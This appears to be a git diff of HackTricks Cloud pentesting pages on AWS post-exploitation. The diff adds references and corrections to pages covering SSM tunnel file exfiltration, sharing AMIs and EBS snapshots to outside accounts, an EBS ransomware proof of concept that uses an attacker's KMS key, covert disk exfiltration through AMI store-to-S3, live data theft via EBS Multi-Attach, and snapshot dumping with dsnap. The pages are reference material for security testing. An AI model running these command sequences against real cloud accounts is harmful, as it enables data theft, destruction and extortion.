@@ -287,11 +285,11 @@ aws ssm start-session --target i-0123456789abcdef0 \
   --region <REGION>
 ```
 
-The command establishes a bidirectional tunnel between your workstation (`localPortNumber`) and the selected port (`portNumber`) on the instance **without opening any inbound Security-Group rules**.
+The command establishes a bidirectional tunnel between your workstation (`localPortNumber`) and the selected port (`portNumber`) on the instance **without opening any inbound Security-Group rules**.<sup>[[4]](#references)[[15]](#references)</sup>
 
 Common use cases:
 
-* **File exfiltration**
+* **File exfiltration**<sup>[[4]](#references)</sup>
   1. On the instance start a quick HTTP server that points to the directory you want to exfiltrate:
 
      ```bash
@@ -304,7 +302,7 @@ Common use cases:
      curl http://localhost:8000/loot.txt -o loot.txt
      ```
 
-* **Accessing internal web applications (e.g. Nessus)**
+* **Accessing internal web applications (e.g. Nessus)**<sup>[[4]](#references)</sup>
 
 ```bash
 # Forward remote Nessus port 8834 to local 8835
@@ -314,7 +312,7 @@ aws ssm start-session --target i-0123456789abcdef0 \
 # Browse to http://localhost:8835
 ```
 
-Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail does not log the clear-text content:
+Tip: Compress and encrypt files before transferring them to reduce their size and protect their contents in transit or at the destination:<sup>[[4]](#references)</sup>
 
 ```bash
 # On the instance
@@ -328,15 +326,19 @@ Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail doe
 aws ec2 modify-image-attribute --image-id <image_ID> --launch-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
 ```
 
+This grants the specified AWS account launch permission for the AMI without making the AMI public.<sup>[[12]](#references)</sup>
+
 ### Search sensitive information in public and private AMIs
 
-- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data.
+- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data.<sup>[[14]](#references)</sup>
 
 ### Share EBS Snapshot
 
 ```bash
 aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
 ```
+
+Sharing a snapshot grants the recipient access to all data in that snapshot and permits it to create its own EBS volumes.<sup>[[13]](#references)</sup>
 
 ### EBS Ransomware PoC
 
@@ -436,19 +438,19 @@ First from an 'attacker' AWS account, create a customer managed key in KMS. For 
 }
 ```
 
-The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume:
+The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume:<sup>[[17]](#references)[[18]](#references)</sup>
 
 - `kms:CreateGrant`
 - `kms:Decrypt`
 - `kms:DescribeKey`
 - `kms:GenerateDataKeyWithoutPlainText`
-- `kms:ReEncrypt`
+- `kms:ReEncrypt*`<sup>[[17]](#references)[[18]](#references)</sup>
 
-Now with the publicly accessible key to use. We can use a 'victim' account that has some EC2 instances spun up with unencrypted EBS volumes attached. This 'victim' account's EBS volumes are what we're targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account.
+Now with the publicly accessible key to use. We can use a 'victim' account that has some EC2 instances spun up with unencrypted EBS volumes attached. This 'victim' account's EBS volumes are what we're targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account.<sup>[[17]](#references)[[18]](#references)</sup>
 
 ![Pasted image 20231231172655](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/5b9a96cd-6006-4965-84a4-b090456f90c6) ![Pasted image 20231231172734](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4294289c-0dbd-4eb6-a484-60b4e4266459)
 
-Similar to the S3 ransomware example. This attack will create copies of the attached EBS volumes using snapshots, use the publicly available key from the 'attacker' account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and then finally delete the snapshots used to create the newly encrypted EBS volumes. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e)
+Similar to the S3 ransomware example. This attack will create copies of the attached EBS volumes using snapshots, use the publicly available key from the 'attacker' account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and then finally delete the snapshots used to create the newly encrypted EBS volumes.<sup>[[17]](#references)[[18]](#references)</sup> ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e)
 
 This results in only encrypted EBS volumes left available in the account.
 
@@ -535,7 +537,7 @@ Wait a moment for the newly set key policy to propagate. Then return to the 'vic
 
 ![Pasted image 20231231174131](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/ba9e5340-7020-4af9-95cc-0e02267ced47) ![Pasted image 20231231174258](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/6c3215ec-4161-44e2-b1c1-e32f43ad0fa4)
 
-But when you attempt to actually start the EC2 instance back up with the encrypted EBS volume it'll just fail and go from the 'pending' state back to the 'stopped' state forever since the attached EBS volume can't be decrypted using the key since the key policy no longer allows it.
+But when you attempt to actually start the EC2 instance back up with the encrypted EBS volume it'll just fail and go from the 'pending' state back to the 'stopped' state forever since the attached EBS volume can't be decrypted using the key since the key policy no longer allows it.<sup>[[17]](#references)[[18]](#references)</sup>
 
 ![Pasted image 20231231174322](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/73456c22-0828-4da9-a737-e4d90fa3f514) ![Pasted image 20231231174352](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4d83a90e-6fa9-4003-b904-a4ba7f5944d0)
 
@@ -660,12 +662,24 @@ if __name__ == "__main__":
 
 ## References
 
-- <https://www.sweet.security/blog/ecscape-understanding-iam-privilege-boundaries-in-amazon-ecs>
-- [Latacora - ECS on EC2: Covering Gaps in IMDS Hardening](https://www.latacora.com/blog/2025/10/02/ecs-on-ec2-covering-gaps-in-imds-hardening/)
-- [Latacora ecs-on-ec2-gaps-in-imds-hardening Terraform repo](https://github.com/latacora/ecs-on-ec2-gaps-in-imds-hardening)
-- [Pentest Partners – How to transfer files in AWS using SSM](https://www.pentestpartners.com/security-blog/how-to-transfer-files-in-aws-using-ssm/)
+- [1] [Sweet Security – ECScape: Understanding IAM Privilege Boundaries in Amazon ECS](https://www.sweet.security/blog/ecscape-understanding-iam-privilege-boundaries-in-amazon-ecs)
+- [2] [Latacora – ECS on EC2: Covering Gaps in IMDS Hardening](https://www.latacora.com/blog/2025/10/02/ecs-on-ec2-covering-gaps-in-imds-hardening/)
+- [3] [Latacora – ecs-on-ec2-gaps-in-imds-hardening Terraform repository](https://github.com/latacora/ecs-on-ec2-gaps-in-imds-hardening)
+- [4] [Pen Test Partners – How to transfer files in AWS using SSM](https://www.pentestpartners.com/security-blog/how-to-transfer-files-in-aws-using-ssm/)
+- [5] [Naor Haziz – ECScape: Understanding IAM Privilege Boundaries in Amazon ECS](https://naorhaziz.com/posts/ecscape-iam-privilege-boundaries-in-ecs/)
+- [6] [Naor Haziz – ECScape proof of concept](https://github.com/naorhaziz/ecscape)
+- [7] [AWS – Best practices for IAM roles in Amazon ECS](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/security-iam-roles.html)
+- [8] [AWS – Amazon ECS task networking options for EC2](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-networking.html)
+- [9] [AWS – Configure the Instance Metadata Service options](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-options.html)
+- [10] [AWS – How Traffic Mirroring works](https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html)
+- [11] [AWS – Create an Amazon EBS-backed AMI](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/creating-an-ami-ebs.html)
+- [12] [AWS – Share an AMI with specific AWS accounts](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-explicit.html)
+- [13] [AWS – Share an Amazon EBS snapshot with other AWS accounts](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-modifying-snapshot-permissions.html)
+- [14] [saw-your-packet – CloudShovel](https://github.com/saw-your-packet/CloudShovel)
+- [15] [AWS – Start a session](https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager-working-with-sessions-start.html)
+- [16] [AWS – Install the Session Manager plugin for the AWS CLI](https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager-working-with-install-plugin.html)
+- [17] [AWS – Default key policy](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html)
+- [18] [AWS – Amazon EBS encryption examples](https://docs.aws.amazon.com/ebs/latest/userguide/encryption-examples.html)
 
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ami-store-s3-exfiltration.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ami-store-s3-exfiltration.md
@@ -1,26 +1,29 @@
 # AWS – Covert Disk Exfiltration via AMI Store-to-S3 (CreateStoreImageTask)
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Summary
-Abuse EC2 AMI export-to-S3 to exfiltrate the full disk of an EC2 instance as a single raw image stored in S3, then download it out-of-band. This avoids snapshot sharing and produces one object per AMI.
+Abuse EC2 `CreateImage` plus `CreateStoreImageTask` to package an EBS-backed AMI—including its EBS snapshot data and most non-Region-specific metadata—into one compressed object in an S3 bucket, then retrieve it out of band. The resulting `.bin` object is an AMI bundle rather than an uncompressed, directly mountable raw disk image; download and process it offline, or restore it with `CreateRestoreImageTask`.<sup>[[1]](#references)[[4]](#references)</sup>
 
 ## Requirements
-- EC2: `ec2:CreateImage`, `ec2:CreateStoreImageTask`, `ec2:DescribeStoreImageTasks` on the target instance/AMI
-- S3 (same Region): `s3:PutObject`, `s3:GetObject`, `s3:ListBucket`, `s3:AbortMultipartUpload`, `s3:PutObjectTagging`, `s3:GetBucketLocation`
-- KMS decrypt on the key that protects the AMI snapshots (if EBS default encryption is enabled)
-- S3 bucket policy that trusts the `vmie.amazonaws.com` service principal (see below)
+- An EBS-backed AMI; these store APIs do not support paravirtual (PV) AMIs.<sup>[[4]](#references)</sup>
+- EC2: `ec2:CreateImage`, `ec2:DescribeImages`, `ec2:CreateStoreImageTask`, and `ec2:DescribeStoreImageTasks` for the workflow below. Cleanup additionally uses `ec2:DeregisterImage` and `ec2:DeleteSnapshot`.<sup>[[2]](#references)[[3]](#references)</sup>
+- S3 (same Region): `s3:CreateBucket` when creating the bucket, plus `s3:PutObject`, `s3:GetObject`, `s3:ListBucket`, `s3:AbortMultipartUpload`, `s3:PutObjectTagging`, and `s3:DeleteObject` for the store, verification, and cleanup steps.<sup>[[2]](#references)[[4]](#references)[[6]](#references)</sup>
+- The store task also needs the EBS direct API actions `ebs:CompleteSnapshot`, `ebs:GetSnapshotBlock`, `ebs:ListChangedBlocks`, `ebs:ListSnapshotBlocks`, `ebs:PutSnapshotBlock`, and `ebs:StartSnapshot`, plus `ec2:GetEbsEncryptionByDefault`, `ec2:DescribeTags`, and `ec2:CreateTags`.<sup>[[2]](#references)</sup>
+- If the AMI snapshots are encrypted, the caller must be allowed to use the KMS key; customer-managed EBS keys commonly require `kms:CreateGrant`, `kms:Decrypt`, `kms:DescribeKey`, `kms:GenerateDataKeyWithoutPlaintext`, and `kms:ReEncrypt`, subject to the key policy.<sup>[[2]](#references)[[5]](#references)</sup>
+- Keep the destination bucket private. AWS recommends blocking public access and enabling server-side encryption for buckets that hold stored AMIs.<sup>[[2]](#references)</sup>
 
 ## Impact
-- Full offline acquisition of the instance root disk in S3 without sharing snapshots or copying across accounts.
-- Allows stealth forensics on credentials, configuration, and filesystem contents from the exported raw image.
+- Full offline acquisition of the EBS snapshot data represented by the AMI in one S3 object without changing snapshot sharing settings.
+- Allows stealth forensics on credentials, configuration, and filesystem contents from the exported AMI bundle.
 
 ## How to Exfiltrate via AMI Store-to-S3
 
 - Notes:
-  - The S3 bucket must be in the same Region as the AMI.
-  - In `us-east-1`, `create-bucket` must NOT include `--create-bucket-configuration`.
-  - `--no-reboot` creates a crash-consistent image without stopping the instance (stealthier but less consistent).
+  - The S3 bucket must be in the Region where the store request is made, which must match the AMI's Region.<sup>[[1]](#references)[[4]](#references)</sup>
+  - In `us-east-1`, `create-bucket` must not include `--create-bucket-configuration`; other Regions require the matching `LocationConstraint`.<sup>[[6]](#references)</sup>
+  - `--no-reboot` leaves the instance running but creates crash-consistent snapshots; buffered or in-memory data may be absent and file-system integrity is not guaranteed.<sup>[[3]](#references)</sup>
+  - The store task compresses the AMI data and makes the object visible only after the task completes; the resulting `.bin` object is not a raw disk image.<sup>[[1]](#references)[[2]](#references)</sup>
+
+The sequence below creates a temporary AMI, waits for it to become available, stores it as one S3 object, polls the asynchronous store task, verifies object access, and then removes the temporary resources. `CreateStoreImageTask` reads all EBS snapshots in the AMI and preserves supported AMI metadata in the stored object.<sup>[[1]](#references)[[2]](#references)</sup>
 
 <details>
 <summary>Step-by-step commands</summary>
@@ -38,62 +41,50 @@ else
   aws s3api create-bucket --bucket "$BUCKET" --create-bucket-configuration LocationConstraint=$REGION --region "$REGION"
 fi
 
-# 2) (Recommended) Bucket policy to allow VMIE service to write the object
-ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
-cat > /tmp/bucket-policy.json <<POL
-{
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Sid": "AllowVMIEPut",
-      "Effect": "Allow",
-      "Principal": {"Service": "vmie.amazonaws.com"},
-      "Action": [
-        "s3:PutObject", "s3:AbortMultipartUpload", "s3:ListBucket",
-        "s3:GetBucketLocation", "s3:GetObject", "s3:PutObjectTagging"
-      ],
-      "Resource": [
-        "arn:aws:s3:::$BUCKET",
-        "arn:aws:s3:::$BUCKET/*"
-      ],
-      "Condition": {
-        "StringEquals": {"aws:SourceAccount": "$ACCOUNT_ID"},
-        "ArnLike": {"aws:SourceArn": "arn:aws:ec2:$REGION:$ACCOUNT_ID:image/ami-*"}
-      }
-    }
-  ]
-}
-POL
-aws s3api put-bucket-policy --bucket "$BUCKET" --policy file:///tmp/bucket-policy.json
-
-# 3) Create an AMI of the victim (stealthy: do not reboot)
+# 2) Create an AMI of the victim (stealthy: do not reboot)
 AMI_ID=$(aws ec2 create-image --instance-id "$INSTANCE_ID" --name exfil-$(date +%s) --no-reboot --region "$REGION" --query ImageId --output text)
 
-# 4) Wait until the AMI is available
+# 3) Wait until the AMI is available
 aws ec2 wait image-available --image-ids "$AMI_ID" --region "$REGION"
 
-# 5) Store the AMI to S3 as a single object (raw disk image)
+# 4) Store the AMI to S3 as a single compressed AMI object
 OBJKEY=$(aws ec2 create-store-image-task --image-id "$AMI_ID" --bucket "$BUCKET" --region "$REGION" --query ObjectKey --output text)
 
 echo "Object in S3: s3://$BUCKET/$OBJKEY"
 
-# 6) Poll the task until it completes
-until [ "$(aws ec2 describe-store-image-tasks --image-ids "$AMI_ID" --region "$REGION" \
-  --query StoreImageTaskResults[0].StoreTaskState --output text)" = "Completed" ]; do
-  aws ec2 describe-store-image-tasks --image-ids "$AMI_ID" --region "$REGION" \
-    --query StoreImageTaskResults[0].StoreTaskState --output text
-  sleep 10
+# 5) Poll the task until it completes or fails
+while :; do
+  STATE=$(aws ec2 describe-store-image-tasks --image-ids "$AMI_ID" --region "$REGION" \
+    --query 'StoreImageTaskResults[0].StoreTaskState' --output text)
+  echo "$STATE"
+  case "$STATE" in
+    Completed)
+      break
+      ;;
+    InProgress)
+      sleep 10
+      ;;
+    Failed|None|"")
+      echo "Store task failed or was not found: $STATE" >&2
+      exit 1
+      ;;
+    *)
+      echo "Unexpected store task state: $STATE" >&2
+      exit 1
+      ;;
+  esac
 done
 
-# 7) Prove access to the exported image (download first 1MiB)
+# 6) Prove access to the stored AMI object (download first 1 MiB)
 aws s3api head-object --bucket "$BUCKET" --key "$OBJKEY" --region "$REGION"
 aws s3api get-object --bucket "$BUCKET" --key "$OBJKEY" --range bytes=0-1048575 /tmp/ami.bin --region "$REGION"
 ls -l /tmp/ami.bin
 
-# 8) Cleanup (deregister AMI, delete snapshots, object & bucket)
+# 7) Cleanup (deregister AMI, delete snapshots, object & bucket)
+SNAPSHOT_IDS=$(aws ec2 describe-images --image-ids "$AMI_ID" --region "$REGION" \
+  --query 'Images[0].BlockDeviceMappings[].Ebs.SnapshotId' --output text)
 aws ec2 deregister-image --image-id "$AMI_ID" --region "$REGION"
-for S in $(aws ec2 describe-images --image-ids "$AMI_ID" --region "$REGION" \
-           --query Images[0].BlockDeviceMappings[].Ebs.SnapshotId --output text); do
+for S in $SNAPSHOT_IDS; do
   aws ec2 delete-snapshot --snapshot-id "$S" --region "$REGION"
 done
 aws s3 rm "s3://$BUCKET/$OBJKEY" --region "$REGION"
@@ -104,13 +95,15 @@ aws s3 rb "s3://$BUCKET" --force --region "$REGION"
 
 ## Evidence Example
 
-- `describe-store-image-tasks` transitions:
+`DescribeStoreImageTasks` reports `InProgress`, `Completed`, or `Failed`; a successful task can show:<sup>[[1]](#references)</sup>
+
 ```text
 InProgress
 Completed
 ```
 
-- S3 object metadata (example):
+The stored object also carries S3 metadata for the AMI name, description, registration date, owner account, and store timestamp. The following values are illustrative:<sup>[[1]](#references)</sup>
+
 ```json
 {
   "AcceptRanges": "bytes",
@@ -127,7 +120,7 @@ Completed
 }
 ```
 
-- Partial download proves object access:
+Partial download proves object access:
 ```bash
 ls -l /tmp/ami.bin
 # -rw-r--r--  1 user  wheel  1048576 Oct  8 03:32 /tmp/ami.bin
@@ -135,8 +128,19 @@ ls -l /tmp/ami.bin
 
 ## Required IAM Permissions
 
-- EC2: `CreateImage`, `CreateStoreImageTask`, `DescribeStoreImageTasks`
-- S3 (on export bucket): `PutObject`, `GetObject`, `ListBucket`, `AbortMultipartUpload`, `PutObjectTagging`, `GetBucketLocation`
-- KMS: If AMI snapshots are encrypted, allow decrypt for the EBS KMS key used by snapshots
+- Store-task IAM policy: `ec2:CreateStoreImageTask`, `ec2:DescribeStoreImageTasks`, `ec2:GetEbsEncryptionByDefault`, `ec2:DescribeTags`, `ec2:CreateTags`; `ebs:CompleteSnapshot`, `ebs:GetSnapshotBlock`, `ebs:ListChangedBlocks`, `ebs:ListSnapshotBlocks`, `ebs:PutSnapshotBlock`, `ebs:StartSnapshot`; and `s3:GetObject`, `s3:ListBucket`, `s3:PutObject`, `s3:PutObjectTagging`, `s3:AbortMultipartUpload`.<sup>[[2]](#references)</sup>
+- The commands above additionally need `s3:CreateBucket` (when creating the bucket), `s3:DeleteObject` (cleanup), `ec2:CreateImage`, `ec2:DescribeImages`, `ec2:DeregisterImage`, and `ec2:DeleteSnapshot`.
+- The S3 permissions for this flow belong to the IAM principal running the store operation. If the bucket is owned by another AWS account, its bucket policy must authorize that principal or account in addition to the caller's identity policy; do not add a `vmie.amazonaws.com` service-principal statement solely for this flow.<sup>[[2]](#references)[[7]](#references)</sup>
+- For encrypted snapshots, allow the caller to use the relevant EBS KMS key according to its key policy; see the KMS actions listed above.<sup>[[2]](#references)[[5]](#references)</sup>
+
+## References
+
+- [1] [How AMI store and restore works](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/store-restore-how-it-works.html)
+- [2] [Create a store image task](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/work-with-ami-store-restore.html)
+- [3] [CreateImage API reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateImage.html)
+- [4] [Store and restore an AMI using S3](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ami-store-restore.html)
+- [5] [Requirements for Amazon EBS encryption](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-encryption-requirements.html)
+- [6] [create-bucket — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/s3api/create-bucket.html)
+- [7] [How Amazon S3 authorizes a request for a bucket operation](https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-auth-workflow-bucket-operation.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-multi-attach-data-theft.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-multi-attach-data-theft.md
@@ -1,22 +1,22 @@
 # AWS - Live Data Theft via EBS Multi-Attach
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Summary
-Abuse EBS Multi-Attach to read from a live io1/io2 data volume by attaching the same volume to an attacker-controlled instance in the same Availability Zone (AZ). Mounting the shared volume read-only gives immediate access to in-use files without creating snapshots.
+Amazon EBS Multi-Attach allows one Provisioned IOPS SSD (`io1` or `io2`) volume to be attached to multiple Nitro instances in the same Availability Zone (AZ), and each attachment has full read/write access to the shared block device.<sup>[[1]](#references)</sup> The attack path below applies that capability to obtain data from a second instance without creating a snapshot, but the result is a live and potentially inconsistent filesystem view.<sup>[[1]](#references)</sup>
+
+AWS cautions that ordinary XFS and EXT4 mounts do not coordinate concurrent access from separate EC2 hosts. Use this procedure only in an authorized test or response workflow, and treat the read-only mount as a best-effort view rather than a consistency guarantee.<sup>[[1]](#references)</sup>
 
 ## Requirements
-- Target volume: io1 or io2 created with `--multi-attach-enabled` in the same AZ as the attacker instance.
-- Permissions: `ec2:AttachVolume`, `ec2:DescribeVolumes`, `ec2:DescribeInstances` on the target volume/instances.
-- Infrastructure: Nitro-based instance types that support Multi-Attach (C5/M5/R5 families, etc.).
+- Target volume: `io1` or `io2` created with `--multi-attach-enabled` in the same AZ as the attacker instance.<sup>[[1]](#references)[[2]](#references)</sup>
+- Permissions: `ec2:AttachVolume`, `ec2:DescribeVolumes`, and (when discovering instance placement) `ec2:DescribeInstances`; the setup block additionally needs `ec2:CreateVolume` and `ec2:CreateTags` for the test volume and tag.<sup>[[6]](#references)</sup>
+- Infrastructure: Nitro-based instance types that support Multi-Attach (C5/M5/R5 families, etc.).<sup>[[1]](#references)</sup>
 
 ## Notes
-- Mount read-only with `-o ro,noload` to reduce corruption risk and avoid journal replays.
-- On Nitro instances the EBS NVMe device exposes a stable `/dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_vol...` path (helper below).
+- For the ext4 example, mount read-only with `-o ro,noload`: ext4 normally replays its journal even with `ro`, while `noload` prevents that mount from writing the journal. Skipping replay can expose existing filesystem inconsistencies, so this is not an integrity guarantee.<sup>[[5]](#references)</sup>
+- On Nitro instances, EBS volumes appear as NVMe devices and expose the EBS volume ID as their serial; NVMe enumeration can change between boots. The helper below uses a common Linux `/dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_vol...` alias, but verify it with `lsblk -o +SERIAL` or `ebsnvme-id` when the alias is unavailable.<sup>[[4]](#references)</sup>
 
 ## Prepare a Multi-Attach io2 volume and attach to victim
 
-Example (create in `us-east-1a` and attach to the victim):
+Example (create in `us-east-1a` and attach to the victim). New volumes start with Multi-Attach disabled; the CLI flag below enables it during creation, while post-creation enablement is limited to an unattached `io2` volume.<sup>[[2]](#references)</sup>
 
 ```bash
 AZ=us-east-1a
@@ -48,11 +48,15 @@ sudo sync
 
 ## Attach the same volume to the attacker instance
 
+The volume and each attached instance must be in the same AZ; Multi-Attach supports up to 16 Nitro instances.<sup>[[1]](#references)[[3]](#references)</sup>
+
 ```bash
 aws ec2 attach-volume --volume-id $VOL_ID --instance-id $ATTACKER_INSTANCE --device /dev/sdf
 ```
 
 ## Mount read-only on the attacker and read data
+
+This lab uses ext4 and intentionally mounts the second attachment with `ro,noload` to avoid adding mount-side writes. That option does not provide cross-host filesystem coordination, and the victim can still write to the volume, so the observed view may be inconsistent.<sup>[[1]](#references)[[5]](#references)</sup>
 
 ```bash
 VOLNOHYP="vol${VOL_ID#vol-}"
@@ -62,7 +66,7 @@ sudo mount -o ro,noload "$DEV" /mnt/steal
 sudo cat /mnt/steal/secret.txt
 ```
 
-Expected result: The same `VOL_ID` shows multiple `Attachments` (victim and attacker) and the attacker can read files written by the victim without creating any snapshot.
+Expected result: The same `VOL_ID` shows multiple `Attachments` (victim and attacker), and the attacker can read files written by the victim without creating a snapshot. `describe-volumes` exposes the volume's attachment details for this verification.<sup>[[1]](#references)[[7]](#references)</sup>
 
 ```bash
 aws ec2 describe-volumes --volume-ids $VOL_ID \
@@ -72,7 +76,7 @@ aws ec2 describe-volumes --volume-ids $VOL_ID \
 <details>
 <summary>Helper: find the NVMe device path by Volume ID</summary>
 
-On Nitro instances, use the stable by-id path that embeds the volume id (drop the dash after `vol`):
+On Linux images that expose the common by-id alias, use the path that embeds the volume ID (drop the dash after `vol`). If it is absent, use the volume serial or `ebsnvme-id` mapping described above.<sup>[[4]](#references)</sup>
 
 ```bash
 VOLNOHYP="vol${VOL_ID#vol-}"
@@ -83,7 +87,17 @@ ls -l /dev/disk/by-id/ | grep "$VOLNOHYP"
 </details>
 
 ## Impact
-- Immediate read access to live data on the target EBS volume without generating snapshots.
-- If mounted read-write the attacker can tamper with the victim filesystem (risk of corruption).
+- Immediate read access to live data on the target EBS volume without generating snapshots.<sup>[[1]](#references)</sup>
+- If mounted read-write, the attacker can tamper with the victim filesystem; concurrent access to a standard filesystem can cause corruption.<sup>[[1]](#references)</sup>
+
+## References
+
+- [1] [Attach an EBS volume to multiple EC2 instances using Multi-Attach - Amazon EBS](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-volumes-multi.html)
+- [2] [Enable Multi-Attach for an Amazon EBS volume - Amazon EBS](https://docs.aws.amazon.com/ebs/latest/userguide/working-with-multi-attach.html)
+- [3] [Attach an Amazon EBS volume to an Amazon EC2 instance - Amazon EBS](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-attaching-volume.html)
+- [4] [Map Amazon EBS volumes to NVMe device names - Amazon EBS](https://docs.aws.amazon.com/ebs/latest/userguide/identify-nvme-ebs-device.html)
+- [5] [ext4 General Information - The Linux Kernel documentation](https://www.kernel.org/doc/html/latest/admin-guide/ext4.html)
+- [6] [Actions, resources, and condition keys for Amazon EC2 - Service Authorization Reference](https://docs.aws.amazon.com/service-authorization/latest/reference/list_ec2.html)
+- [7] [View information about an Amazon EBS volume - Amazon EBS](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-describing-volumes.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
@@ -1,8 +1,8 @@
 # AWS - EBS Snapshot Dump
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Checking a snapshot locally
+
+`dsnap` uses the EBS Direct APIs to list and download completed snapshots and can initialize a Vagrantfile for mounting the resulting image. Passing an instance ID can create a temporary snapshot when no existing snapshot is found.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 # Install dependencies
@@ -11,7 +11,7 @@ brew install vagrant
 brew install virtualbox
 
 # Get snapshot from image
-mkdir snap_wordir; cd snap_workdir
+mkdir snap_workdir; cd snap_workdir
 dsnap init
 ## Download a snapshot of the volume of that instance
 ## If no snapshot existed it will try to create one
@@ -22,9 +22,9 @@ dsnap list #List snapshots
 dsnap get snap-0dbb0347f47e38b96 #Download snapshot directly
 
 # Run with vagrant
-IMAGE="<download_file>.img" vagrant up #Run image with vagrant+virtuabox
+IMAGE="<download_file>.img" vagrant up #Run image with vagrant+VirtualBox
 IMAGE="<download_file>.img" vagrant ssh #Access the VM
-vagrant destroy #To destoy
+vagrant destroy #To destroy
 
 # Run with docker
 git clone https://github.com/RhinoSecurityLabs/dsnap.git
@@ -33,12 +33,14 @@ make docker/build
 IMAGE="<download_file>.img" make docker/run #With the snapshot downloaded
 ```
 
+The Vagrant and Docker commands above follow dsnap's documented mounting workflows; the Vagrant path converts the raw image to VDI, while the Docker path uses libguestfs.<sup>[[2]](#references)[[3]](#references)</sup>
+
 > [!CAUTION]
-> **Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that:
+> The EBS Direct APIs do not support public snapshots. Copy a public or shared snapshot into an account you control first, then download the copy.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 # Copy the snapshot
-aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57"
+aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --region us-east-2 --description "copy of snap-09cf5d9801f231c57"
 
 # View the snapshot info
 aws ec2 describe-snapshots --owner-ids self --region us-east-2
@@ -50,57 +52,75 @@ dsnap --region us-east-2 get snap-027da41be451109da
 aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2
 ```
 
-For more info on this technique check the original research in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/)
+The copy/describe/delete sequence follows the AWS snapshot operations, after which dsnap can download the account-owned copy.<sup>[[2]](#references)[[6]](#references)[[10]](#references)[[11]](#references)</sup>
 
-You can do this with Pacu using the module [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots)
